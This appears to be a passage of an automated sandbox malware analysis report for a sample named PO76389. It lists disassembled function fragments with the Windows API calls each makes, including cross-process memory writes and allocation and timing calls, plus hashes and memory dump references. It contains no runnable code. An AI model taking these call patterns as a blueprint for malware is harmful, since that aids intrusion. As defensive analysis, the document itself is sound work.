                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Window$ForegroundPixelRelease
                                                    • String ID:
                                                    • API String ID: 4156661090-0
                                                    • Opcode ID: 2c3f74fb44a7e5b64d27a071717b9f8c164eeed1384bbe3d6b65deb4a783d5db
                                                    • Instruction ID: 66182d87a2dcc479e0c16d2f3655a280fb9756eaa8b6f84b04c46239664220b8
                                                    • Opcode Fuzzy Hash: 2c3f74fb44a7e5b64d27a071717b9f8c164eeed1384bbe3d6b65deb4a783d5db
                                                    • Instruction Fuzzy Hash: 0F218175A00204AFDB00EF65DC89AAA7BF9EF48305B05847DE95A97351CA74AD04DBA0
                                                    APIs
                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 004CB5EB
                                                    • SelectObject.GDI32(?,00000000), ref: 004CB5FA
                                                    • BeginPath.GDI32(?), ref: 004CB611
                                                    • SelectObject.GDI32(?,00000000), ref: 004CB63B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ObjectSelect$BeginCreatePath
                                                    • String ID:
                                                    • API String ID: 3225163088-0
                                                    • Opcode ID: 882432b08fc4af5c52b76a584c23b705f8707bca9ad48745cb351e73669e274a
                                                    • Instruction ID: 4d7e2e6a34e3a0953365472a7751363054f78e4bcf4b7e62299eb7aa9a9da65f
                                                    • Opcode Fuzzy Hash: 882432b08fc4af5c52b76a584c23b705f8707bca9ad48745cb351e73669e274a
                                                    • Instruction Fuzzy Hash: BA21B374900714EBCB109F19FC4ABAA3BF9FB25355F14015BE458522A0D37448D9FF9A
                                                    APIs
                                                    • __calloc_crt.LIBCMT ref: 004D2E81
                                                    • CreateThread.KERNEL32(?,?,004D2FB7,00000000,?,?), ref: 004D2EC5
                                                    • GetLastError.KERNEL32 ref: 004D2ECF
                                                    • _free.LIBCMT ref: 004D2ED8
                                                    • __dosmaperr.LIBCMT ref: 004D2EE3
                                                      • Part of subcall function 004D889E: __getptd_noexit.LIBCMT ref: 004D889E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                    • String ID:
                                                    • API String ID: 2664167353-0
                                                    • Opcode ID: c683616ecc37c65bff5c1db95e0845e48ddc4bd56e01c812eddc2f244ab85bde
                                                    • Instruction ID: 661e299878ecd1509ac708322f17d4fafa58061501dfa6a48fb14dd95d653155
                                                    • Opcode Fuzzy Hash: c683616ecc37c65bff5c1db95e0845e48ddc4bd56e01c812eddc2f244ab85bde
                                                    • Instruction Fuzzy Hash: 2A1108321043056FD710BF669D51D6B3BA8EF15774710042FF91486351EB79C8019768
                                                    APIs
                                                    • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004EB903
                                                    • GetLastError.KERNEL32(?,004EB3CB,?,?,?), ref: 004EB90D
                                                    • GetProcessHeap.KERNEL32(00000008,?,?,004EB3CB,?,?,?), ref: 004EB91C
                                                    • RtlAllocateHeap.NTDLL(00000000,?,004EB3CB), ref: 004EB923
                                                    • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 004EB93A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 883493501-0
                                                    • Opcode ID: 18fea67e86281f52878fa7863d8ee7fb3610d93671d492e98cf77e1a6b92adac
                                                    • Instruction ID: e7ac401db8af9cb08e21172816e21462ccb03912283296dad7eb42be8b233463
                                                    • Opcode Fuzzy Hash: 18fea67e86281f52878fa7863d8ee7fb3610d93671d492e98cf77e1a6b92adac
                                                    • Instruction Fuzzy Hash: DD016DB1201244BFDF114FA6EC89D6B3BBDEF8A765B10042AFA45C2360DB758C44EA70
                                                    APIs
                                                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 004F8371
                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 004F837F
                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 004F8387
                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 004F8391
                                                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 004F83CD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                    • String ID:
                                                    • API String ID: 2833360925-0
                                                    • Opcode ID: e92d4165ebbea631fae8f75ef0b1ff79e0363ea46a723ae6739a2121df9b0cf4
                                                    • Instruction ID: ff429589aa159922d4a32af4756a68d1734002e421c78668bb205e3d2e29bed8
                                                    • Opcode Fuzzy Hash: e92d4165ebbea631fae8f75ef0b1ff79e0363ea46a723ae6739a2121df9b0cf4
                                                    • Instruction Fuzzy Hash: 65016D31D0061DDBCF00AFA4ED48AEEBB78FF19B01F00004AEA41B6260CF799554D7A5
                                                    APIs
                                                    • CLSIDFromProgID.COMBASE ref: 004EA874
                                                    • ProgIDFromCLSID.COMBASE(?,00000000), ref: 004EA88F
                                                    • lstrcmpiW.KERNEL32(?,00000000), ref: 004EA89D
                                                    • CoTaskMemFree.COMBASE(00000000), ref: 004EA8AD
                                                    • CLSIDFromString.COMBASE(?,?), ref: 004EA8B9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                    • String ID:
                                                    • API String ID: 3897988419-0
                                                    • Opcode ID: ef00a58887ced46dc6e35659fd7c553e6c6426c32f4c5b9d792e8b2189744524
                                                    • Instruction ID: 207d7ce255433a5c90a85e74323e31a128bec81dbdaa84eee6cdf48abec0e4f5
                                                    • Opcode Fuzzy Hash: ef00a58887ced46dc6e35659fd7c553e6c6426c32f4c5b9d792e8b2189744524
                                                    • Instruction Fuzzy Hash: 05018F76600204BFDB106F66EC44B9ABBBDFF44352F104026F901D2310D774ED599BA2
                                                    APIs
                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 004EB806
                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 004EB810
                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004EB81F
                                                    • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 004EB826
                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004EB83C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 47921759-0
                                                    • Opcode ID: 44077a303f8c39a21dd630f20c7f36d462e17af7e33eadfe4dbdaf4a2824a5c4
                                                    • Instruction ID: 546ece94e88cfef5a160ad84c406275f038266d4588bec0d43574ac8508a4181
                                                    • Opcode Fuzzy Hash: 44077a303f8c39a21dd630f20c7f36d462e17af7e33eadfe4dbdaf4a2824a5c4
                                                    • Instruction Fuzzy Hash: 4BF03775200204AFEB212FA6FC88A6B3B7CFF4AB55B00002AF941C6350DB659855EAB0
                                                    APIs
                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004EB7A5
                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004EB7AF
                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004EB7BE
                                                    • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 004EB7C5
                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004EB7DB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 47921759-0
                                                    • Opcode ID: 609c6e5673711b66a1f4535cfc7211f62687854400b9d0f913cdb36b884bf7d4
                                                    • Instruction ID: 51510b96942e7c399c8872f0d33c50fd29dcd35c7342cf8924b35da3603d2c30
                                                    • Opcode Fuzzy Hash: 609c6e5673711b66a1f4535cfc7211f62687854400b9d0f913cdb36b884bf7d4
                                                    • Instruction Fuzzy Hash: A3F08C312402446FEB110FA5EC88E677BBCFF96B56B00001AF901C6250DB719C05DAB0
                                                    APIs
                                                    • GetDlgItem.USER32(?,000003E9), ref: 004EFA8F
                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 004EFAA6
                                                    • MessageBeep.USER32(00000000), ref: 004EFABE
                                                    • KillTimer.USER32(?,0000040A), ref: 004EFADA
                                                    • EndDialog.USER32(?,00000001), ref: 004EFAF4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                    • String ID:
                                                    • API String ID: 3741023627-0
                                                    • Opcode ID: 9c5e59687a7d12cc3e9c2157f49bfb7cc15a8bd6701f077fb684467f42a7357d
                                                    • Instruction ID: b424cafb8adcd7d456215df16d480bb8fbd92d434a23a37cbd05cb8971d0ec4d
                                                    • Opcode Fuzzy Hash: 9c5e59687a7d12cc3e9c2157f49bfb7cc15a8bd6701f077fb684467f42a7357d
                                                    • Instruction Fuzzy Hash: FA018631500744ABEB209B11ED4EB9677BCBF1070AF04017AB147A92E0DBF4A94C9A64
                                                    APIs
                                                    • EndPath.GDI32(?), ref: 004CB526
                                                    • StrokeAndFillPath.GDI32(?,?,0052F583,00000000,?), ref: 004CB542
                                                    • SelectObject.GDI32(?,00000000), ref: 004CB555
                                                    • DeleteObject.GDI32 ref: 004CB568
                                                    • StrokePath.GDI32(?), ref: 004CB583
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                    • String ID:
                                                    • API String ID: 2625713937-0
                                                    • Opcode ID: fb56a99b0bad819eb215e4a2c6a1779a56b9ba95d1fa2002d7fd24e35adf051a
                                                    • Instruction ID: 7a2057d7f8fc94ef36ce3bc5834bd776d38b596fd0367718330d5b07b707949e
                                                    • Opcode Fuzzy Hash: fb56a99b0bad819eb215e4a2c6a1779a56b9ba95d1fa2002d7fd24e35adf051a
                                                    • Instruction Fuzzy Hash: 34F01934000A04ABCB555F28FC0DB653FF5E721326F088259E4A9442F0D73589DAFF59
                                                    APIs
                                                    • CoInitialize.OLE32(00000000), ref: 004FFAB2
                                                    • CoCreateInstance.COMBASE(0053DA7C,00000000,00000001,0053D8EC,?), ref: 004FFACA
                                                      • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                    • CoUninitialize.COMBASE ref: 004FFD2D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CreateInitializeInstanceUninitialize_memmove
                                                    • String ID: .lnk
                                                    • API String ID: 2683427295-24824748
                                                    • Opcode ID: 0f619f87806e9a646b3be42c075ec918572a7a93b375c19cc0e1223bc975950c
                                                    • Instruction ID: 17c19c60fd0f929bd2d9e789e2538275a3e4fb7b2a3f9038962b3363abd4de47
                                                    • Opcode Fuzzy Hash: 0f619f87806e9a646b3be42c075ec918572a7a93b375c19cc0e1223bc975950c
                                                    • Instruction Fuzzy Hash: 9EA17E71504205AFC300EF65C881EABB7FDEF88708F00491EF55587192EBB4EA09CBA6
                                                    APIs
                                                      • Part of subcall function 004F78AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 004F78CB
                                                    • CoInitialize.OLE32(00000000), ref: 004FF04D
                                                    • CoCreateInstance.COMBASE(0053DA7C,00000000,00000001,0053D8EC,?), ref: 004FF066
                                                    • CoUninitialize.COMBASE ref: 004FF083
                                                      • Part of subcall function 004B84A6: __swprintf.LIBCMT ref: 004B84E5
                                                      • Part of subcall function 004B84A6: __itow.LIBCMT ref: 004B8519
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                    • String ID: .lnk
                                                    • API String ID: 2126378814-24824748
                                                    • Opcode ID: 0a8567c102c41e5f98432044f3cc38da7b37d8124e62458ef485c7494206e024
                                                    • Instruction ID: d7906453ae6fc5d8a4ddc94110f875b29a8897423b6e1ba3ff770d51f6800902
                                                    • Opcode Fuzzy Hash: 0a8567c102c41e5f98432044f3cc38da7b37d8124e62458ef485c7494206e024
                                                    • Instruction Fuzzy Hash: 1EA144356042059FC700DF14C984E6ABBE9BF88324F04899EF9969B3A1DB35EC09CB95
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: #$+
                                                    • API String ID: 0-2552117581
                                                    • Opcode ID: dd5355d53fa2c3cdc48778633f5a980b0f8006775d921c9b43c3f76cee05fc20
                                                    • Instruction ID: 6ebfa2f19158443cbf1fd8f25ca2eead4bddcec33baf451f7e06727226c17dcc
                                                    • Opcode Fuzzy Hash: dd5355d53fa2c3cdc48778633f5a980b0f8006775d921c9b43c3f76cee05fc20
                                                    • Instruction Fuzzy Hash: A0510239904265CFDB15DF69D440BFA7BA4BF26310F14406AF8519B2D0E738AC86CB25
                                                    APIs
                                                    • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0054DC40,?,0000000F,0000000C,00000016,0054DC40,?), ref: 004F507B
                                                      • Part of subcall function 004B84A6: __swprintf.LIBCMT ref: 004B84E5
                                                      • Part of subcall function 004B84A6: __itow.LIBCMT ref: 004B8519
                                                      • Part of subcall function 004BB8A7: _memmove.LIBCMT ref: 004BB8FB
                                                    • CharUpperBuffW.USER32(?,?,00000000,?), ref: 004F50FB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: BuffCharUpper$__itow__swprintf_memmove
                                                    • String ID: REMOVE$THIS
                                                    • API String ID: 2528338962-776492005
                                                    • Opcode ID: fabedd91c93a7d8270f23867e9df4392e49631b0687d20022c194e9198368490
                                                    • Instruction ID: 3088a64d7e7253a162fc8304403b2b3bbea9e639fc0ac41825eb525a3852d0f6
                                                    • Opcode Fuzzy Hash: fabedd91c93a7d8270f23867e9df4392e49631b0687d20022c194e9198368490
                                                    • Instruction Fuzzy Hash: 64418674A006099FCF10EF55C981BBEB7B5BF48308F04805EE6569B392D738AD46CB55
                                                    APIs
                                                      • Part of subcall function 004F4D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004EC9FE,?,?,00000034,00000800,?,00000034), ref: 004F4D6B
                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004ECFC9
                                                      • Part of subcall function 004F4D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004ECA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 004F4D36
                                                      • Part of subcall function 004F4C65: GetWindowThreadProcessId.USER32(?,?), ref: 004F4C90
                                                      • Part of subcall function 004F4C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,004EC9C2,00000034,?,?,00001004,00000000,00000000), ref: 004F4CA0
                                                      • Part of subcall function 004F4C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,004EC9C2,00000034,?,?,00001004,00000000,00000000), ref: 004F4CB6
                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004ED036
                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004ED083
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
